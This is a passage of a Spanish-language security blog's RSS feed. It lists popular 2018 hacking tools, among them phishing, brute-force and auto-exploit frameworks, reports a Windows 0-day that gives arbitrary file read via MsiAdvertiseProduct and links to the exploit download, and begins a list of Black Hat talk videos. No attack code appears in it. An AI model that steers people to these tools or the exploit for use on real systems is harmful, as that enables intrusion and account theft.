&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQP-PSoF95sN85Efc-k5p-fSIwoPf7I7tDTlu3Bj-jFa-OcOMnOI8JSlM7cgEYAembuhe4ZzMoSpuIHlbU9xusc6sDRaBYIOOwfvp9zSX-a8XdL2Ymm32Rd6HNgbg3NIUrg5cOhlA1DD0/s640/vooki_image.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="342" data-original-width="640" height="171" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQP-PSoF95sN85Efc-k5p-fSIwoPf7I7tDTlu3Bj-jFa-OcOMnOI8JSlM7cgEYAembuhe4ZzMoSpuIHlbU9xusc6sDRaBYIOOwfvp9zSX-a8XdL2Ymm32Rd6HNgbg3NIUrg5cOhlA1DD0/s320/vooki_image.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;h2&gt;
&lt;li&gt;
&lt;a href="https://www.kitploit.com//2018/07/devploit-v36-information-gathering-tool.html" target="_blank"&gt;Devploit v3.6 - Information Gathering Tool&lt;/a&gt;&lt;/li&gt;
&lt;/h2&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj2bFbY5dW-SNaQwdhkWXC-dog0IS8iqqQtQinmKDo2cR_dYAwbgCT60MFsAvfIi347Km9dz2cS4_qQw9z7jN4iFWJz_7ey36jsS_BK33FufMjbmzZxwhpCwVmfli1_G8wpNtb3f-pP2Vw/s640/Devploit_8.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="480" data-original-width="640" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj2bFbY5dW-SNaQwdhkWXC-dog0IS8iqqQtQinmKDo2cR_dYAwbgCT60MFsAvfIi347Km9dz2cS4_qQw9z7jN4iFWJz_7ey36jsS_BK33FufMjbmzZxwhpCwVmfli1_G8wpNtb3f-pP2Vw/s320/Devploit_8.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;h2&gt;
&lt;li&gt;
&lt;a href="https://www.kitploit.com//2018/04/tinfoleak-v24-most-complete-open-source.html" target="_blank"&gt;Tinfoleak v2.4 - The Most Complete Open-Source Tool For Twitter Intelligence Analysis&lt;/a&gt;&lt;/li&gt;
&lt;/h2&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi8X3m8RzdCS_nCbap0Q4GXjKNmwGdaDe6f_3c3CY_FP4t29hMCbnkxkcHSWgIl3xN3zFc_-NZkiFtpSeFM-2uI4F7inhJGJZch0zNQkg0uffFVVsVOMHD0K0mA5pT0KyC8gq95gNU9tak/s640/tinfoleak-ui.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="357" data-original-width="640" height="178" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi8X3m8RzdCS_nCbap0Q4GXjKNmwGdaDe6f_3c3CY_FP4t29hMCbnkxkcHSWgIl3xN3zFc_-NZkiFtpSeFM-2uI4F7inhJGJZch0zNQkg0uffFVVsVOMHD0K0mA5pT0KyC8gq95gNU9tak/s320/tinfoleak-ui.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;h2&gt;
&lt;li&gt;
&lt;a href="https://www.kitploit.com//2018/10/andrax-first-and-unique-penetration.html" target="_blank"&gt;ANDRAX - The First And Unique Penetration Testing Platform For Android Smartphones&lt;/a&gt;&lt;/li&gt;
&lt;/h2&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEmefJzyGJ4iAoGI6xIOZwEAopY4d4V2qdoS3cvR4nXwaHNgtR74asvMnIJmy5X8pnzgOOOMdbk8_Ji-HL8h_NjjeKpB-xHFl4S2O0KWkefDn__gAknPEUU5Auht4OAewaz3nSNipQrLV9/s640/andrax.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="360" data-original-width="640" height="180" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEmefJzyGJ4iAoGI6xIOZwEAopY4d4V2qdoS3cvR4nXwaHNgtR74asvMnIJmy5X8pnzgOOOMdbk8_Ji-HL8h_NjjeKpB-xHFl4S2O0KWkefDn__gAknPEUU5Auht4OAewaz3nSNipQrLV9/s320/andrax.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;h2&gt;
&lt;li&gt;
&lt;a href="https://www.kitploit.com//2018/09/socialbox-bruteforce-attack-framework.html" target="_blank"&gt;SocialBox - A Bruteforce Attack Framework (Facebook, Gmail, Instagram, Twitter)&lt;/a&gt;&lt;/li&gt;
&lt;/h2&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgVdZ1YKJW22k4QkKAb8iZTJdGdHGrMLHNxyqsic05fLzmjFbVGjMJzYjEl6oFS989M5d2kMVpOOXj-Sjsvpy8XQHxaiaxgzb6lRIDbHgk5Qisbk0NnZqfVyn8ABTDMIpDTondI78JltgSQ/s640/SocialBox_1_sb.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="405" data-original-width="577" height="224" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgVdZ1YKJW22k4QkKAb8iZTJdGdHGrMLHNxyqsic05fLzmjFbVGjMJzYjEl6oFS989M5d2kMVpOOXj-Sjsvpy8XQHxaiaxgzb6lRIDbHgk5Qisbk0NnZqfVyn8ABTDMIpDTondI78JltgSQ/s320/SocialBox_1_sb.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;h2&gt;
&lt;li&gt;
&lt;a href="https://www.kitploit.com//2018/03/th3inspector-tool-for-information.html" target="_blank"&gt;Th3Inspector - Tool for Information Gathering&lt;/a&gt;&lt;/li&gt;
&lt;/h2&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4FPvfZOePwrPP99Pl9s163ra21HXhjaT4MpA9fWSovIN9ADeQJdzIxDbwCgNSRU19mzeH-8H7cHrt5KN6cJVUilWZB_eXnu4oRKNKNvXKTchksjhc-B7VQdGGE7sG7bA6wk36glSuVa0/s640/Th3inspector_5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="435" data-original-width="640" height="217" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4FPvfZOePwrPP99Pl9s163ra21HXhjaT4MpA9fWSovIN9ADeQJdzIxDbwCgNSRU19mzeH-8H7cHrt5KN6cJVUilWZB_eXnu4oRKNKNvXKTchksjhc-B7VQdGGE7sG7bA6wk36glSuVa0/s320/Th3inspector_5.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;h2&gt;
&lt;li&gt;
&lt;a href="https://www.kitploit.com//2018/07/pure-blood-v20-penetration-testing.html" target="_blank"&gt;Pure Blood v2.0 - A Penetration Testing Framework Created For Hackers / Pentester / Bug Hunter&lt;/a&gt;&lt;/li&gt;
&lt;/h2&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxKIhPBbnZ7vOi3lsHZ7HKjSwEZBc2UE3kyYxuEmxnyFUrIXqB5pkAeILEWHGgl_H7nzgdkbmT33gA0CrLK83A0Xn7TkcwTlb156CwyZ_MOSYqTYmkS5OTFopZCXjxKdNTYfVzLOM9oQJk/s1600/pureblood.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="493" data-original-width="607" height="259" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxKIhPBbnZ7vOi3lsHZ7HKjSwEZBc2UE3kyYxuEmxnyFUrIXqB5pkAeILEWHGgl_H7nzgdkbmT33gA0CrLK83A0Xn7TkcwTlb156CwyZ_MOSYqTYmkS5OTFopZCXjxKdNTYfVzLOM9oQJk/s320/pureblood.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;h2&gt;
&lt;li&gt;
&lt;a href="https://www.kitploit.com//2018/08/kali-linux-20183-release-penetration.html" target="_blank"&gt;Kali Linux 2018.3 Release - Penetration Testing and Ethical Hacking Linux Distribution&lt;/a&gt;&lt;/li&gt;
&lt;/h2&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjD4BIh4y20nQbouadmPqEJFeSJdrU1JGLYiVgKK1Ss5rd9kZip6LWPCgPQKWN4xTn7QET00Y48hMo_vioffM5Qv1fgBLoT2SR6jQ9kJPDULZKSaF9QlNTvNQUPcLRm-pqH3ui4fffPtK4/s640/kali-release.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="228" data-original-width="640" height="114" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjD4BIh4y20nQbouadmPqEJFeSJdrU1JGLYiVgKK1Ss5rd9kZip6LWPCgPQKWN4xTn7QET00Y48hMo_vioffM5Qv1fgBLoT2SR6jQ9kJPDULZKSaF9QlNTvNQUPcLRm-pqH3ui4fffPtK4/s320/kali-release.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;h2&gt;
&lt;li&gt;
&lt;a href="https://www.kitploit.com//2018/06/wifite-210-automated-wireless-attack.html" target="_blank"&gt;Wifite 2.1.0 - Automated Wireless Attack Tool&lt;/a&gt;&lt;/li&gt;
&lt;/h2&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhw_ACefVxYkDoVRVdYxhyphenhyphenFZqU_KbcwbeCUBkYt87S6mTkCgj0bjLfG9m2gbXiTFHyJIqEWPiHswg2hnGVhVGrCc3744YCIwo-bhVl_oRiMTnIaasWpB-GT-Fny1dyUu1j2BwZpS2I_2eE/s640/wifite2_4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="328" data-original-width="640" height="164" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhw_ACefVxYkDoVRVdYxhyphenhyphenFZqU_KbcwbeCUBkYt87S6mTkCgj0bjLfG9m2gbXiTFHyJIqEWPiHswg2hnGVhVGrCc3744YCIwo-bhVl_oRiMTnIaasWpB-GT-Fny1dyUu1j2BwZpS2I_2eE/s320/wifite2_4.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;h2&gt;
&lt;li&gt;
&lt;a href="https://www.kitploit.com//2018/04/infection-monkey-automated-pentest-tool.html" target="_blank"&gt;Infection Monkey - An Automated Pentest Tool&lt;/a&gt;&lt;/li&gt;
&lt;/h2&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjyp7HNL0cZSTvaKhzg-YXPyIkbJYvi4gMR8HCzBZoUgisNp7Yh8v2aqGjxssDtCcaKKmG9ytK44GypKlca8shYffKFkrFguSVTiSmDEUi6uCphakYeQiESSqIL4_ymLN3GJuocwmvrie0/s640/monkey_1_map-full.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="353" data-original-width="640" height="176" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjyp7HNL0cZSTvaKhzg-YXPyIkbJYvi4gMR8HCzBZoUgisNp7Yh8v2aqGjxssDtCcaKKmG9ytK44GypKlca8shYffKFkrFguSVTiSmDEUi6uCphakYeQiESSqIL4_ymLN3GJuocwmvrie0/s320/monkey_1_map-full.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;h2&gt;
&lt;li&gt;
&lt;a href="https://www.kitploit.com//2018/07/trackerjacker-like-nmap-for-mapping.html" target="_blank"&gt;Trackerjacker - Like Nmap For Mapping Wifi Networks You'Re Not Connected To, Plus Device Tracking&lt;/a&gt;&lt;/li&gt;
&lt;/h2&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEinqTnTN5HPWIItSlEtT93otiTtHCeZWBE66bVRPKuDPmHVsiCJzFIlZ_GvxQxnRb_feUW2fl2JIwmKJR8-6lBXut5J1Rl3hvjlrN3CPoznU9ysdAbnBHcKpt5Vg-pcJ-HXyCYnUz_j4UU/s1600/Trackerjacker.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="579" data-original-width="657" height="282" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEinqTnTN5HPWIItSlEtT93otiTtHCeZWBE66bVRPKuDPmHVsiCJzFIlZ_GvxQxnRb_feUW2fl2JIwmKJR8-6lBXut5J1Rl3hvjlrN3CPoznU9ysdAbnBHcKpt5Vg-pcJ-HXyCYnUz_j4UU/s320/Trackerjacker.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;h2&gt;
&lt;li&gt;
&lt;a href="https://www.kitploit.com//2018/04/badmod-badmod-detect-website-cms.html" target="_blank"&gt;BadMod - Detect Website CMS, Website Scanner &amp;amp; Auto Exploiter&lt;/a&gt;&lt;/li&gt;
&lt;/h2&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgi2mngi6KisHyPhWI2HzRrCorOdAqMFHXyAn4uszqsxUVFlQu_1p6bQQW6J-rlqXrtsRcqIB8YpcGPWMgEdoeQR-dDYAeT1qOU3mmPrVyZrowFRz1XJJNWDYoIvlCUyy1-k9eBUz4IjkE/s1600/BadMod_1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="615" data-original-width="584" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgi2mngi6KisHyPhWI2HzRrCorOdAqMFHXyAn4uszqsxUVFlQu_1p6bQQW6J-rlqXrtsRcqIB8YpcGPWMgEdoeQR-dDYAeT1qOU3mmPrVyZrowFRz1XJJNWDYoIvlCUyy1-k9eBUz4IjkE/s320/BadMod_1.png" width="303" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;h2&gt;
&lt;li&gt;
&lt;a href="https://www.kitploit.com//2018/07/photon-incredibly-fast-crawler-which.html" target="_blank"&gt;Photon - Incredibly Fast Crawler Which Extracts Urls, Emails, Files, Website Accounts And Much More&lt;/a&gt;&lt;/li&gt;
&lt;/h2&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivx0gsrpYi1ohzdXbd4tP4NibPJRe43JevieXshmE-DrDOh12G1HIL_zXYNOYWEJ6-c4JSdK5sHG8hSumHOIgKZ3vLP-q01J_WzW6D4ygRbhqLN1kM7Hx2XXCjZKnBByLRxYTh7xU0Dj4/s640/Photon_1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="370" data-original-width="640" height="185" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivx0gsrpYi1ohzdXbd4tP4NibPJRe43JevieXshmE-DrDOh12G1HIL_zXYNOYWEJ6-c4JSdK5sHG8hSumHOIgKZ3vLP-q01J_WzW6D4ygRbhqLN1kM7Hx2XXCjZKnBByLRxYTh7xU0Dj4/s320/Photon_1.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;h2&gt;
&lt;li&gt;
&lt;a href="https://www.kitploit.com//2018/01/socialfish-ultimate-phishing-tool-with.html" target="_blank"&gt;SocialFish - Ultimate phishing tool with Ngrok integrated&lt;/a&gt;&lt;/li&gt;
&lt;/h2&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEinzGD6KiZ7DrHYv96MP-CrVRBo8-AHyWlGj1jXsj2C8uIAJlZIdH6pvZzMGckQ2K7UGaypH0Gxtc2r5Rtx5KlmI4smS3RpBSUbhbIqrYUtBMFN2b9SU6ypY_o1zWqIRwosoV8M6-eECVQ/s640/SocialFish_3_sc.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="360" data-original-width="640" height="180" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEinzGD6KiZ7DrHYv96MP-CrVRBo8-AHyWlGj1jXsj2C8uIAJlZIdH6pvZzMGckQ2K7UGaypH0Gxtc2r5Rtx5KlmI4smS3RpBSUbhbIqrYUtBMFN2b9SU6ypY_o1zWqIRwosoV8M6-eECVQ/s320/SocialFish_3_sc.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;/ol&gt;
&lt;br /&gt;
&lt;b&gt;Fuente: &lt;/b&gt;&lt;a href="https://www.kitploit.com/2018/12/top-20-most-popular-hacking-tools-in.html" target="_blank"&gt;https://kitploit.com&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
[+] Saludos y feliz año nuevo!!&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhELom_Ru4K432pvBoIi-E1LqjwHSCvXBr_QShCIOeegsm8qY3MI-CeW7bplUpZuooPsN8m-LqZOECiu-gLCUioKQiU6IqgKbPJVWHqdPjcmyQtmUAbptToTDwbEBIT_GeaxAKkemSbzqwd/s72-c/tools-2018-title-2.png" width="72"/><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>0-Day en Windows permite la lectura de cualquier archivo sin privilegios</title><link>http://www.blackploit.com/2018/12/0day-en-windows-permite-la-lectura-de.html</link><category>0-day</category><category>Exploit</category><category>Windows OS</category><author>noreply@blogger.com (Leo Romero)</author><pubDate>Thu, 20 Dec 2018 16:29:00 -0300</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-8845092171963399971.post-7745826866014867409</guid><description>&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEicMJI6jgz-Ywg4zZHDuls4hsg4rLR5aYfN2xp-xGnFxMVLRazK_Wmuj-i5Mi907PLZLu4fi5WGImUCEpQ9po7tNCtTywFR0fHE4_08PguKYutx49TIpTgRtTP3g35_S827Z_V3O8kPMocO/s1600/readfile.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="810" data-original-width="1514" height="342" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEicMJI6jgz-Ywg4zZHDuls4hsg4rLR5aYfN2xp-xGnFxMVLRazK_Wmuj-i5Mi907PLZLu4fi5WGImUCEpQ9po7tNCtTywFR0fHE4_08PguKYutx49TIpTgRtTP3g35_S827Z_V3O8kPMocO/s640/readfile.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
El investigador de seguridad &lt;a href="https://twitter.com/Evil_Polar_Bear" target="_blank"&gt;SandboxEscaper&lt;/a&gt; ha publicado hoy el PoC para una nueva vulnerabilidad 0day que afecta a Windows que permite a un usuario con pocos privilegios o a un programa malicioso 
leer el contenido de cualquier archivo en un equipo con Windows, que de otro 
modo sólo sería posible con privilegios de 
administrador.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;/div&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
Según el investigador, debido a una validación incorrecta, se puede 
abusar de la función "&lt;b&gt;&lt;i&gt;MsiAdvertiseProduct&lt;/i&gt;&lt;/b&gt;" de Windows 
que se encarga de generar "un script publicitario para anunciar un producto y&amp;nbsp; que permite al instalador escribir en un script la 
información de registro" forzando al servicio de instalación a 
hacer una copia de cualquier archivo con privilegios de SYSTEM y leer 
su contenido, lo que resulta en una &lt;b&gt;vulnerabilidad de lectura arbitraria de 
archivos&lt;/b&gt;.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
SandboxEscaper nos comparte un vídeo demostrativo donde podemos ver el funcionamiento de su exploit readfile.exe para leer un archivo con privilegios de SYSTEM:&lt;/div&gt;
&lt;br /&gt;
&lt;div style="text-align: center;"&gt;
&lt;iframe allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture" allowfullscreen="" frameborder="0" height="315" src="https://www.youtube.com/embed/x4P2H64GI1o" width="560"&gt;&lt;/iframe&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
Además de compartir el vídeo de demostración de la vulnerabilidad, SandboxEscaper también publicó su exploit en Github, pero debido a que &lt;b&gt;Github hoy es de Microsoft&lt;/b&gt;, decidieron cerrar su cuenta sin mayores explicaciones.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Si desean descargar este exploit 0day (aún), lo pueden hacer con alguno de los enlaces que hay en el &lt;b&gt;&lt;a href="https://sandboxescaper.blogspot.com/2018/12/readfile-0day.html" target="_blank"&gt;blog de SandboxEscaper&lt;/a&gt;&lt;/b&gt;, lamentablemente no está disponible en Github.&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Fuentes:&lt;/b&gt;&lt;br /&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://twitter.com/Evil_Polar_Bear/status/107560501110576742" target="_blank"&gt;https://twitter.com/Evil_Polar_Bear&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://sandboxescaper.blogspot.com/" target="_blank"&gt;https://sandboxescaper.blogspot.com&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://thehackernews.com/2018/12/windows-zero-day-exploit.html" target="_blank"&gt;https://thehackernews.com&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;br /&gt;</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEicMJI6jgz-Ywg4zZHDuls4hsg4rLR5aYfN2xp-xGnFxMVLRazK_Wmuj-i5Mi907PLZLu4fi5WGImUCEpQ9po7tNCtTywFR0fHE4_08PguKYutx49TIpTgRtTP3g35_S827Z_V3O8kPMocO/s72-c/readfile.png" width="72"/><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>Vídeos Presentaciones de Black Hat USA 2018</title><link>http://www.blackploit.com/2018/11/videos-presentaciones-de-black-hat-usa.html</link><category>Black Hat</category><category>Presentaciones</category><category>Video</category><author>noreply@blogger.com (Leo Romero)</author><pubDate>Mon, 19 Nov 2018 20:12:00 -0300</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-8845092171963399971.post-7017729405086201825</guid><description>&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJ2EhEIExfJpwP4FbKOWIsZjsAkaCC1-MPQyefoxXLjbPVKbF69HrzA9Ou_iS_mdQ2S_C1TVrM4BqdXPL31_Ry-WGFbGuqLGEeYja5wGjehyRP9-IPAct23WP3-0mk02yFyo_FdxwuIbzO/s1600/blackhat_2018.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="1067" data-original-width="1600" height="426" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJ2EhEIExfJpwP4FbKOWIsZjsAkaCC1-MPQyefoxXLjbPVKbF69HrzA9Ou_iS_mdQ2S_C1TVrM4BqdXPL31_Ry-WGFbGuqLGEeYja5wGjehyRP9-IPAct23WP3-0mk02yFyo_FdxwuIbzO/s640/blackhat_2018.jpg" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;
&lt;div style="text-align: justify;"&gt;
&lt;b&gt;Black Hat USA&lt;/b&gt; es el evento de seguridad de la información más importante del mundo, proporcionando a los asistentes lo último en investigación, desarrollo y tendencias. Todos los años asistentes de todas partes y de cualquier rubro, viajan a la conferencia para aprender lo último en ciberseguridad y hacking.&lt;/div&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;
Este es su año 21° y ya han liberado los &lt;a href="https://www.youtube.com/playlist?list=PLH15HpR5qRsVAXGmSVfjWrGtGLJjIJuGe"&gt;vídeos&lt;/a&gt; de las presentaciones:&lt;br /&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=py2qmGbyhlw&amp;amp;index=2&amp;amp;t=4s&amp;amp;list=PLH15HpR5qRsVAXGmSVfjWrGtGLJjIJuGe"&gt;Black Hat USA 2018 Keynote: Parisa Tabriz&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=vH28IUgJCH8&amp;amp;index=3&amp;amp;t=0s&amp;amp;list=PLH15HpR5qRsVAXGmSVfjWrGtGLJjIJuGe"&gt;How can Communities Move Forward After Incidents of Sexual Harassment or Assault?&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=s0Tqi7fuOSU&amp;amp;index=4&amp;amp;t=0s&amp;amp;list=PLH15HpR5qRsVAXGmSVfjWrGtGLJjIJuGe"&gt;Unpacking the Packed Unpacker: Reverse Engineering an Android Anti-Analysis Native Library&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=_xsnedUp4ko&amp;amp;index=5&amp;amp;t=0s&amp;amp;list=PLH15HpR5qRsVAXGmSVfjWrGtGLJjIJuGe"&gt;Fire &amp;amp; Ice: Making and Breaking macOS Firewalls&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=j2RrmNxJZ5c&amp;amp;index=6&amp;amp;t=0s&amp;amp;list=PLH15HpR5qRsVAXGmSVfjWrGtGLJjIJuGe"&gt;Practical Web Cache Poisoning: Redefining ‘Unexploitable’&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=HTM3ZrSvp6c&amp;amp;index=7&amp;amp;t=0s&amp;amp;list=PLH15HpR5qRsVAXGmSVfjWrGtGLJjIJuGe"&gt;An Attacker Looks at Docker: Approaching Multi-Container Applications&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=49KoUmiJuts&amp;amp;index=8&amp;amp;t=0s&amp;amp;list=PLH15HpR5qRsVAXGmSVfjWrGtGLJjIJuGe"&gt;SirenJack: Cracking a ‘Secure’ Emergency Warning Siren System&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=0XSaiLOLfEc&amp;amp;index=9&amp;amp;t=0s&amp;amp;list=PLH15HpR5qRsVAXGmSVfjWrGtGLJjIJuGe"&gt;Are You Trading Stocks Securely? Exposing Security Flaws in Trading Technologies&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=_eSAF_qT_FY&amp;amp;index=10&amp;amp;t=0s&amp;amp;list=PLH15HpR5qRsVAXGmSVfjWrGtGLJjIJuGe"&gt;GOD MODE UNLOCKED - Hardware Backdoors in x86 CPUs&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=FsUw5ToRCLE&amp;amp;index=11&amp;amp;t=0s&amp;amp;list=PLH15HpR5qRsVAXGmSVfjWrGtGLJjIJuGe"&gt;Finding Xori: Malware Analysis Triage with Automated Disassembly&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=q9KWeXRk8UU&amp;amp;index=12&amp;amp;t=0s&amp;amp;list=PLH15HpR5qRsVAXGmSVfjWrGtGLJjIJuGe"&gt;Miasm: Reverse Engineering Framework&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=1FU_hl-AfKU&amp;amp;index=13&amp;amp;t=0s&amp;amp;list=PLH15HpR5qRsVAXGmSVfjWrGtGLJjIJuGe"&gt;Over-the-Air: How we Remotely Compromised the Gateway, BCM, and Autopilot ECUs of Tesla Cars&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=9gPl1DrJfSU&amp;amp;index=14&amp;amp;t=0s&amp;amp;list=PLH15HpR5qRsVAXGmSVfjWrGtGLJjIJuGe"&gt;DeepLocker - Concealing Targeted Attacks with AI Locksmithing&lt;/a&gt;&lt;/li&gt;
